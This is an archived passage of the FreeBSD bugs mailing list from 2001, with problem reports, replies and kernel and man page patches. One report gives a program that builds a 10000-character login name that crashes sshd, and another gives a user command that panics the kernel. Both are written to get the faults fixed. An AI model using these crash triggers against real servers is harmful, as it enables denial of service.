From owner-freebsd-bugs Sun Jun 3 0:33:11 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from the.oneinsane.net (the.oneinsane.net [66.42.61.25]) by hub.freebsd.org (Postfix) with ESMTP id 840B137B422; Sun, 3 Jun 2001 00:33:07 -0700 (PDT) (envelope-from blovett@venus.bsdguru.com) Received: from venus.bsdguru.com (venus.n2.net [207.113.133.11]) by the.oneinsane.net (Postfix) with ESMTP id 9486C9BF7; Sat, 2 Jun 2001 12:50:15 -0700 (PDT) Received: by venus.bsdguru.com (Postfix, from userid 1000) id B55BE38; Sat, 2 Jun 2001 12:50:15 -0700 (PDT) Date: Sat, 2 Jun 2001 12:50:14 -0700 From: Ben Lovett To: jdp@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: i386/24871: Pagefaults occur at random on a 4.2-STABLE machine Message-ID: <20010602125013.A13069@bsdguru.com> References: <200106021928.f52JSdU14755@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106021928.f52JSdU14755@freefall.freebsd.org>; from jdp@FreeBSD.org on Sat, Jun 02, 2001 at 12:28:39PM -0700 X-Organization: San Diego BSD Users Group [http://www.sdbug.org] X-Disclaimer: All messages are the opinion of my employer.. They just don't know it yet. X-Operating-System: FreeBSD venus 4.3-STABLE X-Moon: The Moon is Waxing Gibbous (89% of Full) X-GPG-Key: http://www.oneinsane.net/~blovett/blovett.pgp X-GPG-Fingerprint: C75F A722 1518 03B8 26C3 77A1 7C76 8AFA EBAB 2004 X-Uptime: 12:49PM up 18:52, 5 users, load averages: 0.06, 0.15, 0.15 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I believe I saw jdp@FreeBSD.org (jdp@FreeBSD.org) write this: > Synopsis: Pagefaults occur at random on a 4.2-STABLE machine > > State-Changed-From-To: open->feedback > State-Changed-By: jdp > State-Changed-When: Sat Jun 2 12:22:11 PDT 2001 > State-Changed-Why: > I took a look at the code where the trap occurred (ip_input.c > revision 1.130.2.11 line 492), and also at the revision history > for this file. There have been several bug fixes in exactly this > portion of the code since this revision. I have a strong suspicion > that this problem will go away if you upgrade your system to the > latest -stable, or at least to 4.3-release. > > Please let us know whether this fixes the problem, so that we can > close the PR if appropriate. > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24871 > Since filing this PR I have acquired another laptop, and have not noticed these symptoms since. I have a feeling now that there was some problems with the hardware as when I returned the system to my employer, they reloaded Windows on it, and experienced similar problems. With crashes and the like (not that this is at all conclusive ;) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 1:10: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6162C37B401 for ; Sun, 3 Jun 2001 01:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f538A2u74726; Sun, 3 Jun 2001 01:10:02 -0700 (PDT) (envelope-from gnats) Date: Sun, 3 Jun 2001 01:10:02 -0700 (PDT) Message-Id: <200106030810.f538A2u74726@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Yar Tikhiy" Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Reply-To: "Yar Tikhiy" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27432; it has been noted by GNATS. From: "Yar Tikhiy" To: , Cc: Subject: Re: kern/27432: I don't understand one of the kernel boot error messages Date: Sun, 3 Jun 2001 12:07:25 +0400 Please try increasing MAXDEP (file /usr/src/sys/isa/pnpparse.c at about line 39). Unfortunately, the kernel message is rather misleading because the number "8" in it is the MAXDEP value, not the actual number of dependencies in your PnP configuration. -- Yar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 2:20: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C6A1E37B401 for ; Sun, 3 Jun 2001 02:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f539K3m84933; Sun, 3 Jun 2001 02:20:03 -0700 (PDT) (envelope-from gnats) Date: Sun, 3 Jun 2001 02:20:03 -0700 (PDT) Message-Id: <200106030920.f539K3m84933@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Philipp Mergenthaler Subject: Re: kern/9408: parameter reversed to a pci_cfgwrite in pcisupport.c Reply-To: Philipp Mergenthaler Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/9408; it has been noted by GNATS. From: Philipp Mergenthaler To: freebsd-gnats-submit@FreeBSD.org, sbauer@silver.sdsmt.edu Cc: Subject: Re: kern/9408: parameter reversed to a pci_cfgwrite in pcisupport.c Date: Sun, 3 Jun 2001 11:14:10 +0200 pcisupport.c is in the attic; this code is now in sys/dev/pci/fixup_pci.c. Here's an updated patch. Bye, Philipp Index: fixup_pci.c =================================================================== RCS file: /ncvs/src/sys/dev/pci/fixup_pci.c,v retrieving revision 1.2 diff -u -r1.2 fixup_pci.c --- fixup_pci.c 2000/12/12 13:11:42 1.2 +++ fixup_pci.c 2001/06/03 08:48:40 @@ -88,13 +88,13 @@ if (pmccfg & 0x8000) { printf("Correcting Natoma config for SMP\n"); pmccfg &= ~0x8000; - pci_write_config(dev, 0x50, 2, pmccfg); + pci_write_config(dev, 0x50, pmccfg, 2); } #else if ((pmccfg & 0x8000) == 0) { printf("Correcting Natoma config for non-SMP\n"); pmccfg |= 0x8000; - pci_write_config(dev, 0x50, 2, pmccfg); + pci_write_config(dev, 0x50, pmccfg, 2); } #endif } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 2:49: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 463C837B407; Sun, 3 Jun 2001 02:49:07 -0700 (PDT) (envelope-from peter@FreeBSD.org) Received: (from peter@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f539n7H14395; Sun, 3 Jun 2001 02:49:07 -0700 (PDT) (envelope-from peter) Date: Sun, 3 Jun 2001 02:49:07 -0700 (PDT) From: Message-Id: <200106030949.f539n7H14395@freefall.freebsd.org> To: sbauer@silver.sdsmt.edu, peter@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/9408: parameter reversed to a pci_cfgwrite in pcisupport.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: parameter reversed to a pci_cfgwrite in pcisupport.c State-Changed-From-To: open->closed State-Changed-By: peter State-Changed-When: Sun Jun 3 02:47:52 PDT 2001 State-Changed-Why: Suggested changes applied, to -current and -stable. Rev 1.3 & 1.154.2.6 http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9408 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 3: 0:12 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C07E237B403 for ; Sun, 3 Jun 2001 03:00:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53A06b16816; Sun, 3 Jun 2001 03:00:06 -0700 (PDT) (envelope-from gnats) Received: from shadow.otel.net (JuDiCaToR.OTEL.net [212.36.9.113]) by hub.freebsd.org (Postfix) with ESMTP id A19A037B403 for ; Sun, 3 Jun 2001 02:52:48 -0700 (PDT) (envelope-from tbyte@shadow.otel.net) Received: (from tbyte@localhost) by shadow.otel.net (8.11.3/8.11.1) id f539qhc10077; Sun, 3 Jun 2001 12:52:43 +0300 (EEST) (envelope-from tbyte) Message-Id: <200106030952.f539qhc10077@shadow.otel.net> Date: Sun, 3 Jun 2001 12:52:43 +0300 (EEST) From: tbyte@tbyte.org Reply-To: tbyte@tbyte.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27852: Adding default route Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27852 >Category: kern >Synopsis: Kernel can't add default route from network that none of its int >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 03 03:00:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Iasen Kostoff >Release: FreeBSD 4.3-STABLE i386 >Organization: OTEL.net >Environment: System: FreeBSD sat.fury.lan 4.3-STABLE FreeBSD 4.3-STABLE #13: Sun Jun 3 11:23: >Description: You have one interface xl0 with ip 100.1.1.10 and netmask 255.255.255.0 and your gateway is 150.1.1.1. To add this gateway you should add a route to this host lets say: route add -net 150.1.1.0/24 -iface xl0; and then we should add the default : route add default 150.1.1.1. That's the right way but what the kernel say ? - "Network Unreachable" ?!? But we have route to that network , aren't we ? And here is one way this could be done : route add default 100.1.1.10 route add -net 150.1.1.0/24 -iface xl0 route change default 150.1.1.1 Wow everithing works ! :) But do you think that's the right way to be done ? >How-To-Repeat: just try do add default gw from network that none of your interfaces is. >Fix: I looked in the kernel source and found this in rtrequest : if ((ifa = ifa_ifwithroute(flags, dst, gateway)) == 0) senderr(ENETUNREACH); ifa_ifwithroute() can't find a route that exest ? Then I look at ifa_ifwithroute() and saw this : if (ifa == 0) { struct rtentry *rt = rtalloc1(dst, 0, 0UL); Why we search a route to a destination but not to a gateway ? I change it ofcourse and now everything works fine. And this is the changed line just one variable changed : if (ifa == 0) { struct rtentry *rt = rtalloc1(gateway, 0, 0UL); And here is the patch (hum :)) for this : --- route.c.old Thu May 17 02:14:03 2001 +++ route.c Sun Jun 3 11:18:07 2001 @@ -425,7 +425,7 @@ if (ifa == 0) ifa = ifa_ifwithnet(gateway); if (ifa == 0) { - struct rtentry *rt = rtalloc1(dst, 0, 0UL); + struct rtentry *rt = rtalloc1(gateway, 0, 0UL); if (rt == 0) return (0); rt->rt_refcnt--; A long long patch. If you have any sugestions I'd like to hear it as soon as posible because there are some other things in the kernel routing that I want to discuss. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 5:52: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ABDC837B434; Sun, 3 Jun 2001 05:51:55 -0700 (PDT) (envelope-from brian@FreeBSD.org) Received: (from brian@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53Bwap02623; Sun, 3 Jun 2001 04:58:36 -0700 (PDT) (envelope-from brian) Date: Sun, 3 Jun 2001 04:58:36 -0700 (PDT) From: Message-Id: <200106031158.f53Bwap02623@freefall.freebsd.org> To: brian@FreeBSD.org, freebsd-bugs@FreeBSD.org, brian@FreeBSD.org Subject: Re: conf/26543: gifconfig in rc.conf ignored if ipv6_enable off Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: gifconfig in rc.conf ignored if ipv6_enable off Responsible-Changed-From-To: freebsd-bugs->brian Responsible-Changed-By: brian Responsible-Changed-When: Sun Jun 3 04:57:53 PDT 2001 Responsible-Changed-Why: I'll apply this http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26543 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 9:30:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F24337B409 for ; Sun, 3 Jun 2001 09:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53GU2c36486; Sun, 3 Jun 2001 09:30:02 -0700 (PDT) (envelope-from gnats) Date: Sun, 3 Jun 2001 09:30:02 -0700 (PDT) Message-Id: <200106031630.f53GU2c36486@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: setantae Subject: Re: i386/27778: I am unable to read files on a Win2k NTFS slice Reply-To: setantae Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/27778; it has been noted by GNATS. From: setantae To: freebsd-gnats-submit@freebsd.org Cc: setantae@submonkey.net Subject: Re: i386/27778: I am unable to read files on a Win2k NTFS slice Date: Sun, 3 Jun 2001 17:28:59 +0100 This is fixed with a build of today's tree, so I guess it can be closed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 10:33: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E8B4A37B401; Sun, 3 Jun 2001 10:33:04 -0700 (PDT) (envelope-from yar@FreeBSD.org) Received: (from yar@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53HX3F42436; Sun, 3 Jun 2001 10:33:03 -0700 (PDT) (envelope-from yar) Date: Sun, 3 Jun 2001 10:33:03 -0700 (PDT) From: Message-Id: <200106031733.f53HX3F42436@freefall.freebsd.org> To: horape@compendium.com.ar, yar@FreeBSD.org, freebsd-bugs@FreeBSD.org, yar@FreeBSD.org Subject: Re: kern/27851: gif interfaces don't have IFF_RUNNING flag bit set. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: gif interfaces don't have IFF_RUNNING flag bit set. State-Changed-From-To: open->analyzed State-Changed-By: yar State-Changed-When: Sun Jun 3 10:31:36 PDT 2001 State-Changed-Why: Thanx, fixed in -current. Responsible-Changed-From-To: freebsd-bugs->yar Responsible-Changed-By: yar Responsible-Changed-When: Sun Jun 3 10:31:36 PDT 2001 Responsible-Changed-Why: So I won't forget to MFC the fix. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27851 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 12:40:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 36E5F37B403 for ; Sun, 3 Jun 2001 12:40:09 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53Je9r54880; Sun, 3 Jun 2001 12:40:09 -0700 (PDT) (envelope-from gnats) Received: from mgate09.so-net.ne.jp (mgate09.so-net.ne.jp [210.139.254.156]) by hub.freebsd.org (Postfix) with ESMTP id EB53D37B403 for ; Sun, 3 Jun 2001 12:35:07 -0700 (PDT) (envelope-from ipfw@ya3.so-net.ne.jp) Received: from mail.ya3.so-net.ne.jp (mspool11.so-net.ne.jp [210.139.248.11]) by mgate09.so-net.ne.jp (8.8.8+3.0Wbeta9/3.6W01050922) with ESMTP id EAA20686 for ; Mon, 4 Jun 2001 04:35:06 +0900 (JST) Received: from localhost (pd5ce02.kngwnt01.ap.so-net.ne.jp [202.213.206.2]) by mail.ya3.so-net.ne.jp with ESMTP id f53JZ5106927 for ; Mon, 4 Jun 2001 04:35:05 +0900 (JST) Message-Id: <20010604043455C.koya@pluto.math.yokohama-cu.ac.jp> Date: Mon, 04 Jun 2001 04:34:55 +0900 From: Yoshihiro Koya To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27858: There is no urandom(4) man page Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27858 >Category: bin >Synopsis: There is no urandom(4) man page >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 03 12:40:08 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Yoshihiro Koya >Release: FreeBSD 5.0-CURRENT i386 >Organization: Dept. of Math. Sci., Yokohama City Univ. >Environment: System: FreeBSD current.my.domain 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Wed May 30 00:38:02 JST 2001 root@current.my.domain:/usr/obj/usr/src/sys/current i386 >Description: If you browse random(3) man page, you may find SEE ALSO rand(3), srand(3), urandom(4) But there is no urandom(4) man page >How-To-Repeat: Type "man 3 random", for example. >Fix: There are two ways of fix, maybe. (1) add urandom(4) man page Index: Makefile =================================================================== RCS file: /home/ncvs/src/share/man/man4/Makefile,v retrieving revision 1.122 diff -u -r1.122 Makefile --- Makefile 2001/05/26 09:27:08 1.122 +++ Makefile 2001/06/03 19:09:23 @@ -190,6 +190,7 @@ MLINKS+=netintro.4 networking.4 MLINKS+=pcm.4 snd.4 MLINKS+=pcvt.4 vt.4 +MLINKS+=random.4 urandom.4 MLINKS+=scsi.4 CAM.4 MLINKS+=scsi.4 SCSI.4 MLINKS+=scsi.4 cam.4 Index: random.4 =================================================================== RCS file: /home/ncvs/src/share/man/man4/random.4,v retrieving revision 1.7 diff -u -r1.7 random.4 --- random.4 2001/03/12 09:33:07 1.7 +++ random.4 2001/06/03 19:14:46 @@ -27,7 +27,8 @@ .Dt RANDOM 4 .Os .Sh NAME -.Nm random +.Nm random , +.Nm urandom .Nd the entropy device .Sh DESCRIPTION The @@ -157,8 +158,9 @@ handlers force the above variables into the stated ranges. .Sh FILES -.Bl -tag -width /dev/random +.Bl -tag -width /dev/urandom -compact .It Pa /dev/random +.It Pa /dev/urandom .El .Sh SEE ALSO .Xr sysctl 8 (2) unrandom(4) --> random(4) Index: rand.3 =================================================================== RCS file: /home/ncvs/src/lib/libc/stdlib/rand.3,v retrieving revision 1.8 diff -u -u -r1.8 rand.3 --- rand.3 2001/04/27 08:16:57 1.8 +++ rand.3 2001/06/03 19:00:03 @@ -89,7 +89,7 @@ The .Fn sranddev function initializes a seed using the -.Xr urandom 4 +.Xr random 4 random number device which returns good random numbers, suitable for cryptographic use. .Pp @@ -101,7 +101,7 @@ must be supplied by the caller. .Sh SEE ALSO .Xr random 3 , -.Xr urandom 4 +.Xr random 4 .Sh STANDARDS The .Fn rand Index: rand.c =================================================================== RCS file: /home/ncvs/src/lib/libc/stdlib/rand.c,v retrieving revision 1.6 diff -u -u -r1.6 rand.c --- rand.c 2001/04/23 10:38:26 1.6 +++ rand.c 2001/06/03 19:00:34 @@ -111,7 +111,7 @@ * * Many programs choose the seed value in a totally predictable manner. * This often causes problems. We seed the generator using the much more - * secure urandom(4) interface. + * secure random(4) interface. */ void sranddev() Index: random.3 =================================================================== RCS file: /home/ncvs/src/lib/libc/stdlib/random.3,v retrieving revision 1.12 diff -u -u -r1.12 random.3 --- random.3 2000/04/21 09:40:59 1.12 +++ random.3 2001/06/03 18:58:54 @@ -101,7 +101,7 @@ The .Fn srandomdev routine initialize a state array using -.Xr urandom 4 +.Xr random 4 random number device which returns good random numbers, suitable for cryptographic use. Note that this particular seeding @@ -176,7 +176,7 @@ .Sh SEE ALSO .Xr rand 3 , .Xr srand 3 , -.Xr urandom 4 +.Xr random 4 .Sh HISTORY These functions appeared in Index: random.c =================================================================== RCS file: /home/ncvs/src/lib/libc/stdlib/random.c,v retrieving revision 1.15 diff -u -u -r1.15 random.c --- random.c 2001/04/23 10:14:28 1.15 +++ random.c 2001/06/03 19:00:58 @@ -282,7 +282,7 @@ * * Many programs choose the seed value in a totally predictable manner. * This often causes problems. We seed the generator using the much more - * secure urandom(4) interface. Note that this particular seeding + * secure random(4) interface. Note that this particular seeding * procedure can generate states which are impossible to reproduce by * calling srandom() with any value, since the succeeding terms in the * state buffer are no longer derived from the LC algorithm applied to >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 13:40: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3629A37B405 for ; Sun, 3 Jun 2001 13:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53Ke1V61084; Sun, 3 Jun 2001 13:40:01 -0700 (PDT) (envelope-from gnats) Received: from mgate08.so-net.ne.jp (mgate08.so-net.ne.jp [210.139.254.155]) by hub.freebsd.org (Postfix) with ESMTP id 9B6FB37B401 for ; Sun, 3 Jun 2001 13:31:04 -0700 (PDT) (envelope-from ipfw@ya3.so-net.ne.jp) Received: from mail.ya3.so-net.ne.jp (mspool11.so-net.ne.jp [210.139.248.11]) by mgate08.so-net.ne.jp (8.8.8+3.0Wbeta9/3.6W01050922) with ESMTP id FAA10702 for ; Mon, 4 Jun 2001 05:31:03 +0900 (JST) Received: from localhost (pd5ce02.kngwnt01.ap.so-net.ne.jp [202.213.206.2]) by mail.ya3.so-net.ne.jp with ESMTP id f53KV2114806 for ; Mon, 4 Jun 2001 05:31:02 +0900 (JST) Message-Id: <20010604053053T.koya@pluto.math.yokohama-cu.ac.jp> Date: Mon, 04 Jun 2001 05:30:53 +0900 From: Yoshihiro Koya To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27860: sshd caught signal 10 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27860 >Category: bin >Synopsis: sshd dumps core >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 03 13:40:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Yoshihiro Koya >Release: FreeBSD 5.0-CURRENT i386 >Organization: Dept. of Math. Sci., Yokohama City Univ. >Environment: System: FreeBSD current.my.domain 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Wed May 30 00:38:02 JST 2001 root@current.my.domain:/usr/obj/usr/src/sys/current i386 OpenSSH_2.9 green@FreeBSD.org 20010503, SSH protocols 1.5/2.0, OpenSSL 0x0090601f >Description: Too long user name causes sshd to dump core. I tried to make patch. But, I couldn't do it. The following is the output from the gdb. current# ls .cshrc cdrom etc root tmp .profile compat home sbin usr COPYRIGHT dev lost+found sshd.core var bin dist mnt stand boot entropy proc sys current# gdb /usr/sbin/sshd sshd.core GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (no debugging symbols found)... Core was generated by `sshd'. Program terminated with signal 10, Bus error. Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)... done. Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libcrypto.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)... done. Reading symbols from /usr/lib/libz.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libwrap.so.3...(no debugging symbols found)...done. Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...done. Reading symbols from /usr/lib/libc.so.5...(no debugging symbols found)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)...done. #0 0x28225f32 in __log2 () from /usr/lib/libc.so.5 (gdb) where #0 0x28225f32 in __log2 () from /usr/lib/libc.so.5 #1 0x28223d1c in __call_hash () from /usr/lib/libc.so.5 #2 0x28223623 in __hash_open () from /usr/lib/libc.so.5 #3 0x282234be in __hash_open () from /usr/lib/libc.so.5 #4 0x281ec203 in endpwent () from /usr/lib/libc.so.5 #5 0x281eb21a in netname2host () from /usr/lib/libc.so.5 #6 0x281ebbdc in netname2host () from /usr/lib/libc.so.5 #7 0x28213f95 in nsdispatch () from /usr/lib/libc.so.5 #8 0x281ebf45 in getpwnam () from /usr/lib/libc.so.5 #9 0x80537b5 in getsockname () #10 0x805e74f in getsockname () #11 0x80535a2 in getsockname () #12 0x804dc23 in getsockname () #13 0x804c0f9 in getsockname () >How-To-Repeat: Type % slogin localhost -l xxxx<10000 times x's>xxx For example, use the following small program /* genx.c */ #include int main(int argc, char *argv[]) { int i; for (i = 0; i < 10000; i++) putchar('x'); return 0; } and type % slogin localhost -l `./genx` Then, you may get something like as follows: Jun 4 04:54:43 current /boot/kernel/kernel: pid 2479 (sshd), uid 0: exited on signal 10 (core dumped) >Fix: Unfortunately I don't have much enough time to find what casues this, and also don't have good idea to fix it. But the above __log2 function may be found in /usr/src/lib/libc/db/hash/hash_log2.c. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 14:10: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2E57037B403 for ; Sun, 3 Jun 2001 14:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53LA1P65568; Sun, 3 Jun 2001 14:10:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2688137B403 for ; Sun, 3 Jun 2001 14:08:57 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53L8v665498; Sun, 3 Jun 2001 14:08:57 -0700 (PDT) (envelope-from nobody) Message-Id: <200106032108.f53L8v665498@freefall.freebsd.org> Date: Sun, 3 Jun 2001 14:08:57 -0700 (PDT) From: ivan@l123.org To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/27861: system crashes when trying to access /dev/acd0c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27861 >Category: kern >Synopsis: system crashes when trying to access /dev/acd0c >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 03 14:10:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Ivan >Release: 4.3-STABLE >Organization: >Environment: FreeBSD shtaiga.l123.org 4.3-STABLE FreeBSD 4.3-STABLE #10: Sat Jun 2 12:15:18 EEST 2001 root@shtaiga.l123.org:/usr/src/sys/compile/COMKERNEL i386 >Description: if an AudioCD is placed into the CD-Rom drive any user's request to read it as a device panics the sistem. for example: bash-2.05$ cat /dev/acd0c > /home/ivan/cd.rip Note that I didn't have the opportunity to test this on other machines. My system - Celeron 333, 128MB Ram, Zida BX983D MB, Maxtor 90648D3 HDD, Riva TNT2 M64/32MB, TEAC-532B CD-Rom >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 14:30: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6701337B405 for ; Sun, 3 Jun 2001 14:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from 